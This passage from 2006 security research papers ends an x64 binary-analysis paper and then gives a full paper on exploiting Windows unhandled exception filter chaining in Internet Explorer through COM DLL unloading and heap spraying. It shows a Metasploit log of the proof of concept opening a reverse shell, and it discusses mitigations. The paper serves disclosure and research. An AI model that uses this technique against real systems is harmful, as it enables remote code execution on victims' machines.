.text:100006E52 sub rsp, 0B0h
.text:100006E59 lea rbp, [rsp+20h]
.text:100006E5E mov [rbp+0A0h], rbx ; SavedRBX
.text:100006E65 mov [rbp+98h+SavedRSI], rsi ; SavedRSI
.text:100006E6C mov [rbp+98h+SavedRDI], rdi ; SavedRDI
.text:100006E73 mov [rbp+98h+SavedR12], r12 ; SavedR12
.text:100006E7A mov [rbp+98h+SavedR13], r13 ; SavedR13
.text:100006E81 mov [rbp+98h+SavedR14], r14 ; SavedR14
.text:100006E88 mov [rbp+98h+SavedR15], r15 ; SavedR15
While such annotation may not be essential to understanding the
behavior of the binary, it at least simplifies the process of
understanding the layout of the stack.
4.1.3) Exception Handlers
The unwind information structure for a non-leaf function also contains
useful information about the way in which exceptions within that
function should be dispatched. If the unwind information associated
with a function has the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag set,
then the function has an exception handler associated with it. The
exception handler is conveyed through the ExceptionHandler attribute
which comes immediately after the array of unwind codes. This handler is
defined as being a language-specific handler for processing the
exception. More specifically, the exception handler is specific to the
semantics associated with a given programming language, such as C or
C++[3]. For C, the language-specific exception handler is named
__C_specific_handler.
Given that all C functions that handle exceptions will have the same
exception handler, how does the function-specific code for handling an
exception actually get called? For the case of C functions, the
function-specific exception handler is stored in a scope table in the
ExceptionData portion of the UNWIND_INFO structure. Other languages may
have a different ExceptionData definition. This C scope table is defined
by the structures shown below:
typedef struct _C_SCOPE_TABLE_ENTRY {
ULONG Begin;
ULONG End;
ULONG Handler;
ULONG Target;
} C_SCOPE_TABLE_ENTRY, *PC_SCOPE_TABLE_ENTRY;
typedef struct _C_SCOPE_TABLE {
ULONG NumEntries;
C_SCOPE_TABLE_ENTRY Table[1];
} C_SCOPE_TABLE, *PC_SCOPE_TABLE;
The scope table entries describe the function-specific exception
handlers in relation to the specific areas of the function that they
apply to. Each of the attributes of the C_SCOPE_TABLE_ENTRY is expressed
as an RVA. The Target attribute defines the location to transfer
control to after the exception is handled.
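A dispatcher-style lookup over such a scope table might be sketched as
follows; the structure mirrors the C scope table entry above, while the
sample table contents and helper name are invented for illustration.

```c
#include <stddef.h>

/* Mirrors C_SCOPE_TABLE_ENTRY; sample data below is invented, not
   taken from a real binary. All fields are RVAs. */
struct scope_entry {
    unsigned long begin;    /* start of guarded region            */
    unsigned long end;      /* end of guarded region              */
    unsigned long handler;  /* function-specific exception filter */
    unsigned long target;   /* where control resumes afterwards   */
};

/* Return the handler RVA for the entry covering fault_rva, or 0 if no
   scope in the table guards that address. */
static unsigned long find_scope_handler(const struct scope_entry *table,
                                        size_t count,
                                        unsigned long fault_rva)
{
    for (size_t i = 0; i < count; i++)
        if (fault_rva >= table[i].begin && fault_rva < table[i].end)
            return table[i].handler;
    return 0;
}

static const struct scope_entry sample_scopes[] = {
    { 0x1100, 0x1140, 0x4000, 0x1150 },
    { 0x1200, 0x1280, 0x4020, 0x1290 },
};
```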
The reason why all of the exception handler information is useful is
because it makes it possible to annotate a function in terms of what
exception handlers may be called during its execution. It also makes it
possible to identify the exception handler functions that may otherwise
not be found due to the fact that they are executed indirectly. For
example, the function CcAcquireByteRangeForWrite in ntoskrnl.exe can be
annotated in the following fashion:
.text:0000000000434520 ; Exception handler: __C_specific_handler
.text:0000000000434520 ; Language specific handler: sub_4C7F30
.text:0000000000434520
.text:0000000000434520 CcAcquireByteRangeForWrite proc near
4.2) Register Parameter Area Annotation
Given the requirement that the register parameter area be allocated on
the stack in the context of a function that calls other functions, it is
possible to statically annotate specific portions of the stack frame for
a function as being the location of the caller's register parameter
area. Furthermore, the location of a given function's register
parameter area that is to be used by called functions can also be
annotated.
The location of the register parameter area is always at a fixed
location in a stack frame. Specifically, it immediately follows the
return address on the stack. If annotations are added for CallerRCX at
offset 0x8, CallerRDX at offset 0x10, CallerR8 at offset 0x18, and
CallerR9 at offset 0x20, it is possible to get a better view of the
stack frame for a given function. It also makes it easier to understand
when and how this region of the stack is used by a function. For
instance, the CcAcquireByteRangeForWrite function in ntoskrnl.exe makes
use of this area to store the values of the first four parameters:
.text:0000000000434520 mov [rsp+CallerR9], r9
.text:0000000000434525 mov dword ptr [rsp+CallerR8], r8d
.text:000000000043452A mov [rsp+CallerRDX], rdx
.text:000000000043452F mov [rsp+CallerRCX], rcx
5) Conclusion
This paper has presented a few basic approaches that can be used to
extract useful information from an x64 binary for the purpose of
analysis. By analyzing the unwind information associated with
functions, it is possible to get a better understanding for how a
function's stack frame is laid out. Furthermore, the unwind information
makes it possible to describe the relationship between a function and
its exception handler(s). Looking toward the future, x64 is likely to
become the standard architecture given Microsoft's adoption of it as
their primary architecture. With this in mind, coming up with
techniques to better automate the binary analysis process will become
more necessary.
Bibliography
[1] Microsoft Corporation. ntimage.h.
3790 DDK header files.
[2] Microsoft Corporation. Exception Handling (x64).
http://msdn2.microsoft.com/en-us/library/1eyas8tf(VS.80).aspx;
accessed Apr 25, 2006.
[3] Microsoft Corporation. The Language Specific Handler.
http://msdn2.microsoft.com/en-us/library/b6sf5kbd(VS.80).aspx;
accessed Apr 25, 2006.
[4] Microsoft Corporation. Parameter Passing.
http://msdn2.microsoft.com/en-us/library/zthk2dkh.aspx;
accessed Apr 25, 2006.
[5] Microsoft Corporation. Register Usage.
http://msdn2.microsoft.com/en-us/library/9z1stfyw(VS.80).aspx;
accessed Apr 25, 2006.
[6] Microsoft Corporation. SEH in x86 Environments.
http://msdn2.microsoft.com/en-US/library/ms253960.aspx;
accessed Apr 25, 2006.
[7] Microsoft Corporation. Stack Usage.
http://msdn2.microsoft.com/en-us/library/ew5tede7.aspx;
accessed Apr 25, 2006.
[8] Microsoft Corporation. Unwind Data Definitions in C.
http://msdn2.microsoft.com/en-us/library/ssa62fwe(VS.80).aspx;
accessed Apr 25, 2006.
Exploiting the Otherwise Unexploitable on Windows
skywing, skape
May 2006
1) Foreword
Abstract: This paper describes a technique that can be applied in
certain situations to gain arbitrary code execution through software
bugs that would not otherwise be exploitable, such as NULL pointer
dereferences. To facilitate this, an attacker gains control of the
top-level unhandled exception filter for a process in an indirect
fashion. While there has been previous work [1, 3] illustrating the
usefulness in gaining control of the top-level unhandled exception
filter, Microsoft has taken steps in XPSP2 and beyond, such as function
pointer encoding[4], to prevent attackers from being able to overwrite
and control the unhandled exception filter directly. While this
security enhancement is a marked improvement, it is still possible for
an attacker to gain control of the top-level unhandled exception filter
by taking advantage of a design flaw in the way unhandled exception
filters are chained. This approach, however, is limited by an attacker's
ability to control the chaining of unhandled exception filters, such as
through the loading and unloading of DLLs. This does reduce the global
impact of this approach; however, there are some interesting cases where
it can be immediately applied, such as with Internet Explorer.
Disclaimer: This document was written in the interest of education. The
authors cannot be held responsible for how the topics discussed in this
document are applied.
Thanks: The authors would like to thank H D Moore, and everyone who
learns because it's fun.
Update: This issue has now been addressed by the patch included in
MS06-051. A complete analysis has not yet been performed to ensure that
it patches all potential vectors.
With that, on with the show...
2) Introduction
In the security field, software bugs can be generically grouped into two
categories: exploitable or non-exploitable. If a software bug is
exploitable, then it can be leveraged to the advantage of the attacker,
such as to gain arbitrary code execution. However, if a software bug is
non-exploitable, then it is not possible for the attacker to make use of
it for anything other than perhaps crashing the application. In more
cases than not, software bugs will fall into the category of being
non-exploitable simply because they typically deal with common mistakes
or invalid assumptions that are not directly related to buffer
management or loop constraints. This can be frustrating during auditing
and product analysis from an assessment standpoint. With that in mind,
it only makes sense to try to think of ways to turn otherwise
non-exploitable issues into exploitable issues.
In order to accomplish this feat, it's first necessary to try to
consider execution vectors that could be redirected to code that the
attacker controls after triggering a non-exploitable bug, such as a NULL
pointer dereference. For starters, it is known that the triggering of a
NULL pointer dereference will cause an access violation exception to be
dispatched. When this occurs, the user-mode exception dispatcher will
call the registered exception handlers for the thread that generated the
exception, allowing each the opportunity to handle the exception. If
none of the exception handlers know what to do with it, the user-mode
exception dispatcher will call the top-level unhandled exception filter
(UEF) via kernel32!UnhandledExceptionFilter (if one has been set). The
implementation of a function that is set as the registered top-level UEF
is not specified, but in most cases it will be designed to pass
exceptions that it cannot handle onto the top-level UEF that was
registered previously, effectively creating a chain of UEFs. This
process will be explained in more detail in the next chapter.
Aside from the exception dispatching process, there are not any other
controllable execution vectors that an attacker might be able to
redirect without some other situation-specific conditions. For that
reason, the most important place to look for a point of redirection is
within the exception dispatching process itself. This will provide a
generic means of gaining execution control for any bug that can be made
to crash an application.
Since the first part of the exception dispatching process is the calling
of registered exception handlers for the thread, it may make sense to
see if there are any controllable execution paths taken by the
registered exception handlers at the time that the exception is
triggered. This may work in some cases, but is not universal and
requires analysis of the specific exception handler routines. Without
having an ability to corrupt the list of exception handlers, there is
likely to be no other method of redirecting this phase of the exception
dispatching process.
If none of the registered exception handlers can be redirected, one must
look toward a method that can be used to redirect the unhandled
exception filter. This could be accomplished by changing the function
pointer to call into controlled code as illustrated in[1,3]. However,
Microsoft has taken steps in XPSP2, such as encoding the function
pointer that represents the top-level UEF[4]. This no longer makes it
feasible to directly overwrite the global variable that contains the
top-level UEF. With that in mind, it may also make sense to look at the
function associated with top-level UEF at the time that the exception is
dispatched in order to see if the function itself has any meaningful way
to redirect its execution.
From this initial analysis, one is left with being required to perform
an application-dependent analysis of the registered exception handlers
and UEFs that exist at the time that the exception is dispatched. Though
this may be useful in some situations, such situations are likely to be
few and far between. For that reason, it makes sense to try to dive one layer
deeper to learn more about the exception dispatching process. Chapter 3
will describe in more detail how unhandled exception filters work,
setting the stage for the focus of this paper. Based on that
understanding, chapter 4 will expound upon an approach that can be used
to gain indirect control of the top-level UEF. Finally, chapter 5 will
formalize the results of this analysis in an example of a working
exploit that takes advantage of one of the many NULL pointer
dereferences in Internet Explorer to gain arbitrary code execution.
3) Understanding Unhandled Exception Filters
This chapter provides an introductory background into the way unhandled
exception filters are registered and how the process of filtering an
exception that is not handled actually works. This information is
intended to act as a base for understanding the attack vector described
in chapter 4. If the reader already has sufficient understanding of the
way unhandled exception filters operate, feel free to skip ahead.
3.1) Setting the Top-Level UEF
In order to make it possible for applications to handle all exceptions
on a process-wide basis, the exception dispatcher exposes an interface
for registering an unhandled exception filter. The purpose of the
unhandled exception filter is entirely application specific. It can be
used to log extra information about an unhandled exception, perform some
advanced error recovery, handle language-specific exceptions, or any
sort of other task that may need to be taken when an exception occurs
that is not handled. To specify a function that should be used as the
top-level unhandled exception filter for the process, a call must be
made to kernel32!SetUnhandledExceptionFilter, which is prototyped as follows [6]:
LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(
LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
);
When called, this function will take the function pointer passed in as
the lpTopLevelExceptionFilter argument and encode it using
kernel32!RtlEncodePointer. The result of the encoding will be stored in
the global variable kernel32!BasepCurrentTopLevelFilter, thus
superseding any previously established top-level filter. The previous
value stored within this global variable is decoded using
kernel32!RtlDecodePointer and returned to the caller. Again, the
encoding and decoding of this function pointer is intended to prevent
attackers from being able to use an arbitrary memory overwrite to
redirect it as has been done pre-XPSP2.
There are two reasons that kernel32!SetUnhandledExceptionFilter returns
a pointer to the original top-level UEF. First, it makes it possible to
restore the original top-level UEF at some point in the future. Second,
it makes it possible to create an implicit ``chain'' of UEFs. In this
design, each UEF can make a call down to the previously registered
top-level UEF by doing something like the pseudo code below:
... app specific handling ...
if (!IsBadCodePtr(PreviousTopLevelUEF))
return PreviousTopLevelUEF(ExceptionInfo);
else
return EXCEPTION_CONTINUE_SEARCH;
When a block of code that has registered a top-level UEF wishes to
deregister itself, it does so by setting the top-level UEF to the value
that was returned from its call to kernel32!SetUnhandledExceptionFilter.
The reason it does it this way is because there is no true list of
unhandled exception filters that is maintained. This method of
deregistering has one very important property that will serve as the
crux of this document. Since deregistration happens in this fashion,
the register and deregister operations associated with a top-level UEF
must occur in symmetric order.
In one example, the top-level UEF Fx is registered, returning Nx as the
previous top-level UEF. Following that, Gx is registered, returning Fx
as the previous value. After some period of time, Gx is deregistered by
setting Fx as the top-level UEF, thus returning the top-level UEF to the
value it contained before Gx was registered. Finally, Fx deregisters by
setting Nx as the top-level UEF.
3.2) Handling Unhandled Exceptions
When an exception goes through the initial phase of the exception
dispatching process and is not handled by any of the registered
exception handlers for the thread that the exception occurred in, the
exception dispatcher must take one final stab at getting it handled
before forcing the application to terminate. One of the options the
exception dispatcher has at this point is to pass the exception to a
debugger, assuming one is attached. Otherwise, it has no choice but to
try to handle the exception internally and abort the application if that
fails. To allow this to happen, applications can make a call to the
unhandled exception filter associated with the process as described in [5].
In the general case, calling the unhandled exception filter will result
in kernel32!UnhandledExceptionFilter being called with information about
the exception being dispatched.
The job of kernel32!UnhandledExceptionFilter is two fold. First, if a
debugger is not present, it must make a call to the top-level UEF
registered with the process. The top-level UEF can then attempt to
handle the exception, possibly recovering and allowing execution to
continue, such as by returning EXCEPTION_CONTINUE_EXECUTION. Failing
that, it can either forcefully terminate the process, typically by
returning EXCEPTION_EXECUTE_HANDLER or allow the normal error reporting
dialog to be displayed by returning EXCEPTION_CONTINUE_SEARCH. If a
debugger is present, the unhandled exception filter will attempt to pass
the exception on to the debugger in order to give it a chance to handle
the exception. When this occurs, the top-level UEF is not called. This
is important to remember as the paper goes on, as it can be a source of
trouble if one forgets this fact.
When operating with no debugger present,
kernel32!UnhandledExceptionFilter will attempt to decode the function
pointer associated with the top-level UEF by calling
kernel32!RtlDecodePointer on the global variable that contains the
top-level UEF, kernel32!BasepCurrentTopLevelFilter, as shown
below:
7c862cc1 ff35ac33887c push dword ptr [kernel32!BasepCurrentTopLevelFilter]
7c862cc7 e8e1d6faff call kernel32!RtlDecodePointer (7c8103ad)
If the value returned from kernel32!RtlDecodePointer is not NULL, then a
call is made to the now-decoded top-level UEF function, passing the
exception information on:
7c862ccc 3bc7 cmp eax,edi
7c862cce 7415 jz kernel32!UnhandledExceptionFilter+0x15b (7c862ce5)
7c862cd0 53 push ebx
7c862cd1 ffd0 call eax
The return value of the filter will control whether or not the
application continues execution, terminates, or reports an error and
terminates.
3.3) Uses for Unhandled Exception Filters
In most cases, unhandled exception filters are used for
language-specific exception handling. This usage is all done
transparently to programmers of the language. For instance, C++ code
will typically register an unhandled exception filter through
CxxSetUnhandledExceptionFilter during CRT initialization as called from
the entry point associated with the program or shared library.
Likewise, C++ will typically deregister the unhandled exception filter
that it registers by calling CxxRestoreUnhandledExceptionFilter during
program termination or shared library unloading.
Other uses include programs that wish to do advanced error reporting or
information collection prior to allowing an application to terminate due
to an unhandled exception.
4) Gaining Control of the Unhandled Exception Filter
At this point, the only feasible vector for gaining control of the
top-level UEF is to cause calls to be made to
kernel32!SetUnhandledExceptionFilter. This is primarily due to the fact
that the global variable has the current function pointer encoded. One
could consider attempting to cause code to be redirected directly to
kernel32!SetUnhandledExceptionFilter, but doing so would require some
kind of otherwise-exploitable vulnerability in an application, thus
making it not useful in the context of this document.
Given these restrictions, it makes sense to think a little bit more
about the process involved in registering and deregistering UEFs. Since
the chain of registered UEFs is implicit, it may be possible to cause
that chain to become corrupt or invalid in some way that might be
useful. One of the requirements that is known about the registration
process for top-level UEFs is that the register and deregister
operations must be symmetric. What happens if they aren't, though?
Consider the following example where Fx and Gx are registered and
deregistered, but in asymmetric order.
In this example, Fx and Gx are registered first. Following that, Fx is
deregistered prior to deregistering Gx, thus making the operation
asymmetrical. As a result of Fx deregistering first, the top-level UEF
is set to Nx, even though Gx should technically still be a part of the
chain. Finally, Gx deregisters, setting the top-level UEF to Fx even
though Fx had been previously deregistered. This is obviously incorrect
behavior, but the code associated with Gx has no idea that Fx has been
deregistered due to the implicit chain that is created.
If asymmetric registration of UEFs can be made to occur, it might be
possible for an attacker to gain control of the top-level UEF. Consider
for a moment that the register and deregister operations in the
asymmetric example above occur during DLL load and unload, respectively. If that is
the case, then after deregistration occurs, the DLLs associated with the
UEFs will be unloaded. This will leave the top-level UEF set to Fx
which now points to an invalid region of memory. If an exception occurs
after this point and is not handled by a registered exception handler,
the unhandled exception filter will be called. If a debugger is not
attached, the top-level UEF Fx will be called. Since Fx points to
memory that is no longer associated with the DLL that contained Fx, the
process will terminate --- or worse.
From a security perspective, the act of leaving a dangling function
pointer that now points to unallocated memory can be a dream come true.
If a scenario such as this occurs, an attacker can attempt to consume
enough memory that will allow them to store arbitrary code at the
location that the function originally resided. In the event that the
function is called, the attacker's arbitrary code will be executed
rather than the code that was originally at that location. In the
case of the top-level UEF, the only thing that an attacker would need to
do in order to cause the function pointer to be called is to generate an
unhandled exception, such as a NULL pointer dereference.
All of these details combine to provide a feasible vector for executing
arbitrary code. First, it's necessary to be able to cause at least two
DLLs that set UEFs to be deregistered asymmetrically, thus leaving the
top-level UEF pointing to invalid memory. Second, it's necessary to
consume enough memory that attacker controlled code can reside at the
location that one of the UEF functions originally resided. Finally, an
exception must be generated that causes the top-level UEF to be called,
thus executing the attacker's arbitrary code.
The big question, though, is how feasible is it to really be able to
control the registering and deregistering of UEFs? To answer that,
chapter 5 provides a case study on one such application where it's all
too possible: Internet Explorer.
5) Case Study: Internet Explorer
Unfortunately for Internet Explorer, it's time for it to once again don
the all-too-exploitable hat and tell us about how it can be used as a
medium to gain arbitrary code execution from otherwise
non-exploitable bugs. In this approach, Internet Explorer is used as a
medium for causing DLLs that register and deregister top-level UEFs to
be loaded and unloaded. One way in which an attacker can accomplish
this is by using Internet Explorer's facilities for instantiating COM
objects from within the browser. This can be accomplished either by
using the new ActiveXObject construct in JavaScript or by using the HTML
OBJECT tag.
In either case, when a COM object is being instantiated, the DLL
associated with that COM object will be loaded into memory if the object
instance is created in-process (CLSCTX_INPROC_SERVER). When this happens, the COM
object's DllMain will be called. If the DLL has an unhandled exception
filter, it may be registered during CRT initialization as called from
the DLL's entry point. This takes care of the registering of UEFs, so
long as COM objects that are associated with DLLs that set UEFs can be
found.
To control the deregister phase, it is necessary to somehow cause the
DLLs associated with the previously instantiated COM objects to be
unloaded. One approach that can be taken to do this is to attempt to
leverage the locations that ole32!CoFreeUnusedLibrariesEx is called
from. One particular place that it's called from is during the closure
of an Internet Explorer window that once hosted the COM object. When
this function is called, all currently loaded COM DLLs will have their
DllCanUnloadNow routines called. If the routine returns S_OK, such as
when there are no outstanding references to COM objects hosted by the
DLL, then the DLL can be unloaded.
Now that techniques for controlling the loading and unloading of DLLs
that set UEFs have been identified, it's necessary to come up with an
implementation that will allow the deregister phase to occur
asymmetrically. One method that can be used to accomplish this is
illustrated by the registration phase and the deregistration
phase described below.
Registration:
1. Open window #1
2. Instantiate COMObject1
3. Load DLL 1
4. SetUnhandledExceptionFilter(Fx) => Nx
5. Open window #2
6. Instantiate COMObject2
7. Load DLL 2
8. SetUnhandledExceptionFilter(Gx) => Fx
In the example described above, two windows are opened, each of which
registers a UEF by way of a DLL that implements a specific COM object.
In this example, the first window instantiates COMObject1 which is
implemented by DLL 1. When DLL 1 is loaded, it registers a top-level
UEF Fx. Once that completes, the second window is opened which
instantiates COMObject2, thus causing DLL 2 to be loaded which also
registers a top-level UEF, Gx. Once these operations complete, DLL 1
and DLL 2 are still resident in memory and the top-level UEF points to
Gx.
To gain control of the top-level UEF, Fx and Gx will need to be
deregistered asymmetrically. To accomplish this, DLL 1 must be unloaded
before DLL 2. This can be done by closing the window that hosts
COMObject1, thus causing ole32!CoFreeUnusedLibrariesEx to be called
which results in DLL 1 being unloaded. Following that, the window that
hosts COMObject2 should be closed, once again causing unused libraries
to be freed and DLL 2 unloaded. The diagram below illustrates this process.
Deregistration:
1. Close window #1
2. CoFreeUnusedLibrariesEx
3. Unload DLL 1
4. SetUnhandledExceptionFilter(Nx) => Gx
5. Close window #2
6. CoFreeUnusedLibrariesEx
7. Unload DLL 2
8. SetUnhandledExceptionFilter(Fx) => Nx
After the deregistration sequence above completes, Fx will be the top-level UEF for
the process, even though the DLL that hosts it, DLL 1, has been
unloaded. If an exception occurs at this point in time, the unhandled
exception filter will make a call to a function that now points to an
invalid region of memory.
At this point, an attacker now has reasonable control over the top-level
UEF but is still in need of some approach that can be used to place his or
her code at the location that Fx resided at. To accomplish this,
attackers can make use of the heap-spraying[8, 7] technique that has been
commonly applied to browser-based vulnerabilities. The purpose of the
heap-spraying technique is to consume an arbitrary amount of memory that
results in the contents of the heap growing toward a specific address
region. The contents, or spray data, is arbitrary code that will result
in an attacker's direct or indirect control of execution flow once the
vulnerability is triggered. For the purpose of this paper, the trigger
is the generation of an arbitrary exception.
As stated above, the heap-spraying technique can be used to place code
at the location that Fx resided. However, this is limited by whether or
not that location is close enough to the heap to be a practical target
for heap-spraying. In particular, if the heap is growing from
0x00480000 and the DLL that contains Fx was loaded at 0x7c800000, it
would be a requirement that roughly 1.94 GB of data be placed in the
heap. That is, of course, assuming that the target machine has enough
memory to contain this allocation (across RAM and swap). Not to mention
the fact that spraying that much data could take an inordinate amount of
time depending on the speed of the machine. For these reasons, it is
typically necessary for the DLL that contains Fx in this example
scenario to be mapped at an address that is as close as possible to a
region that the heap is growing from.
During the research of this attack vector, it was found that all of the
COM DLLs provided by Microsoft on XPSP2 are compiled to load at higher
addresses which make them challenging to reach with heap-spraying, but
it's not impossible. Many 3rd party COM DLLs, however, are compiled
with a default load address of 0x00400000, thus making them perfect
candidates for this technique. Another thing to keep in mind is that
the preferred load address of a DLL is just that: preferred. If two
DLLs have the same preferred load address, or their mappings would
overlap, then obviously one would be relocated to a new location,
typically at a lower address close to the heap, when it is loaded. By
keeping this fact in mind, it may be possible to load DLLs that overlap,
forcing relocation of a DLL that sets a UEF that would otherwise be
loaded at a higher address.
It is also very important to note that a COM object does not have to be
successfully instantiated for the DLL associated with it to be loaded
into memory. This is because in order for Internet Explorer to
determine whether or not the COM class can be created and is compatible
with one that may be used from Internet Explorer, it must load and query
various COM interfaces associated with the COM class. This fact is very
useful because it means that any DLL that hosts a COM object can be used
--- not just ones that host COM objects that can be successfully
instantiated from Internet Explorer.
The culmination of all of these facts is a functional proof of concept
exploit for Windows XP SP2 and the latest version of Internet Explorer
with all patches applied prior to MS06-051. Its one requirement is that
the target have Adobe Acrobat installed. Alternatively, other 3rd party
(or even MS provided DLLs) can be used so long as they can be feasibly
reached with heap-spraying techniques. Technically speaking, this proof
of concept exploits a NULL pointer dereference to gain arbitrary code
execution. It has been implemented as an exploit module for the 3.0
version of the Metasploit Framework.
The following example shows this proof of concept in action:
msf exploit(windows/browser/ie_unexpfilt_poc) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0
[*] Server started.
[*] Exploit running as background job.
msf exploit(windows/browser/ie_unexpfilt_poc) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059)
msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\mmiller\Desktop>
6) Mitigation Techniques
In the interest of not presenting a problem without a solution, the authors
have devised a few different approaches that might be taken by Microsoft to
solve this issue. Prior to identifying the solution, it is important to
summarize the root of the problem. In this case, the authors feel that the
problem at hand is rooted around a design flaw with the way the unhandled
exception filter ``chain'' is maintained. In particular, the ``chain''
management is an implicit thing which hinges on the symmetric registering and
deregistering of unhandled exception filters. In order to solve this design
problem, some mechanism must be put in place that will eliminate the
symmetrical requirement. Alternatively, the symmetrical requirement could be
retained so long as something ensured that operations never occurred out of
order. The authors feel that this latter approach is more complicated and
potentially not feasible. The following sections will describe a few different
approaches that might be used or considered to solve this issue.
Aside from architecting a more robust implementation, this attack vector may
also be mitigated through conventional exploitation counter-measures, such as
NX and ASLR.
6.1) Behavioral Change to SetUnhandledExceptionFilter
One way in which Microsoft could solve this issue would be to change the
behavior of kernel32!SetUnhandledExceptionFilter in a manner that allows it to
support true registration and deregistration operations rather than implicit
ones. This can be accomplished by making it possible for the function to
determine whether a register operation is occurring or whether a deregister
operation is occurring.
Under this model, when a registration operation occurs,
kernel32!SetUnhandledExceptionFilter can return a dynamically generated context
that merely calls the routine that is previous to the one that was registered.
The fact that the context is dynamically generated makes it possible for the
function to distinguish between registrations and deregistrations. When the
function is called with a dynamically generated context, it can assume that a
deregistration operation is occurring. Otherwise, it must assume that a
registration operation is occurring.
To ensure that the underlying list of registered UEFs is not corrupted,
kernel32!SetUnhandledExceptionFilter can be modified to ensure that when a
deregistration operation occurs, any dynamically generated contexts that
reference the routine being deregistered can be updated to call to the
next-previous routine, if any, or simply return if there is no longer a
previous routine.
6.2) Prevent Setting of non-image UEF
One approach that could be used to solve this issue for the general case is the
modification of kernel32!SetUnhandledExceptionFilter to ensure that the
function pointer being passed in is associated with an image region. By adding
this check at the time this function is called, the attack vector described in
this document can be mitigated. However, doing it in this manner may have
negative implications for backward compatibility. For instance, there are
likely to be cases where this scenario happens completely legitimately without
malicious intent. If a check like this were to be added, a once-working
application would begin to fail due to the added security checks. This is not
an unlikely scenario. Just because an unhandled exception filter is invalid
doesn't mean that it will eventually cause the application to crash because it
may, in fact, never be executed.
6.3) Prevent Execution of non-image UEF
Like preventing the setting of a non-image UEF, it may also be
possible to modify kernel32!UnhandledExceptionFilter to prevent execution of
the top-level UEF if it points to a non-image region. While this seems like it
would be a useful check and should solve the issue, the fact is that it does
not. Consider the scenario where a top-level UEF is set to an invalid address
due to asymmetric deregistration. Following that, the top-level UEF is set to
a new value which is the location of a valid function. After this point, if an
unhandled exception is dispatched, kernel32!UnhandledExceptionFilter will see
that the top-level UEF points to a valid image region and as such will call it.
However, the top-level UEF may be implemented in such a way that it will pass
exceptions that it cannot handle onto the previously registered top-level UEF.
When this occurs, the invalid UEF is called which may point to arbitrary code
at the time that it's executed. The fact that
kernel32!UnhandledExceptionFilter can filter out non-image regions does not
change the fact that uncontrolled UEFs may pass exceptions on up the chain.
7) Future Research
With the technique identified for being able to control the top-level UEF by
taking advantage of asymmetric deregistration, future research can begin to
identify better ways in which to accomplish this. For instance, rather than
relying on child windows in Internet Explorer, there may be another vector
through which ole32!CoFreeUnusedLibrariesEx can be called to cause the
asymmetric deregistration to occur. By default, ole32!CoFreeUnusedLibrariesEx is
called every ten minutes, but this fact is not particularly useful in terms of
general exploitation. There may also be better and more refined techniques that
can be used to more accurately spray the heap in order to place arbitrary code
at the location that a defunct top-level UEF resided at.
Aside from improving the technique itself, it is also prudent to consider other
software applications that could be affected by this. In most cases, this
technique will not be feasible due to an attacker's inability to control the
loading and unloading of DLLs. However, should a mechanism for accomplishing
this be exposed, it may indeed be possible to take advantage of this.
One such target software application that the authors find most intriguing
would be IIS. If it were possible for a remote attacker to cause DLLs that use
UEFs to be loaded and unloaded in a particular order, such as by accessing
websites that load COM objects, then it may be possible for an attacker to
leverage this vector on a remote webserver. At the time of this writing, the
only approach that the authors are aware of that could permit this relies on
remote debugging features present in ASP.NET that allow for the instantiation of COM
objects that are placed in a specific allow list. This isn't a very common
configuration, and is also limited by which COM objects can be instantiated,
thus making it not particularly feasible. However, it is thought that other,
more feasible techniques may exist to accomplish this.
Aside from IIS, the authors are also of the opinion that this attack vector
could be applied to many of the Microsoft Office applications, such as Excel
and Word. These suites are thought to be vulnerable due to the fact that they
permit the instantiation and embedding of arbitrary COM objects in the document
files. If it were possible to come up with a way to control the loading and
unloading of DLLs through these instantiations, it may be possible to take
advantage of the flaw outlined in this paper. One particular way in which this
may be possible is through the use of macros, but this has a lesser severity
because it would require some form of user interaction to permit the execution
of macros.
Another interesting application that may be susceptible to this attack is
Microsoft SQL server. Due to the fact that SQL server has features that permit
the loading and unloading of DLLs, it may be possible to leverage a SQL
injection attack in a way that makes it possible to gain control of the
top-level UEF by causing certain DLLs to be loaded and unloaded. However, given
the ability to load DLLs, there are likely to be other techniques that can be
used to gain code execution as well. If control of the top-level UEF can be
gained this way, a large query with predictable results could be used as a
mechanism to spray the heap. This type
of attack could even be accomplished through something as innocuous as a
website that is merely backed against the SQL server. Remember, attack vectors
aren't always direct.
8) Conclusion
The title of this paper implies that an attacker has the ability to leverage
code execution of bugs that would otherwise not be useful, such as NULL pointer
dereferences. To that point, this paper has illustrated a technique that can
be used to gain control of the top-level unhandled exception filter for an
application by making the registration and deregistration process asymmetrical.
Once the top-level UEF has been made to point to invalid memory, an attacker
can use techniques like heap-spraying to attempt to place attacker controlled
code at the location that the now-defunct top-level UEF resided at. Assuming
this can be accomplished, an attacker simply needs to be able to trigger an
unhandled exception to cause the execution of arbitrary code.
The crux of this attack vector is in leveraging a design flaw in the
assumptions made by the way the unhandled exception filter ``chain'' is
maintained. In particular, the design assumes that calls made to register, and
subsequently deregister, an unhandled exception filter through
kernel32!SetUnhandledExceptionFilter will be done symmetrically. However, this
cannot always be controlled, as DLLs that register unhandled exception filters
are not always guaranteed to be loaded and unloaded in a symmetric fashion. If
an attacker is capable of controlling the order in which DLLs are loaded and
unloaded, then they may be capable of gaining arbitrary code execution through
this technique, such as was illustrated in the Internet Explorer case study in
chapter 5.
While not feasible in most cases, this technique has been proven to work in at
least one critical application: Internet Explorer. Going forward, other
applications, such as IIS, may also be found to be susceptible to this attack
vector. All it will take is a little creativity and the right set of
conditions.
Bibliography
[1] Conover, Matt and Oded Horovitz. Reliable Windows Heap Exploits.
http://cansecwest.com/csw04/csw04-Oded+Connover.ppt; accessed
May 6, 2006.
[2] Kazienko, Przemyslaw and Piotr Dorosz. Hacking an SQL Server.
http://www.windowsecurity.com/articles/HackinganSQLServer.html;
accessed May 7, 2006.
[3] Litchfield, David. Windows Heap Overflows.
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt;
accessed May 6, 2006.
[4] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
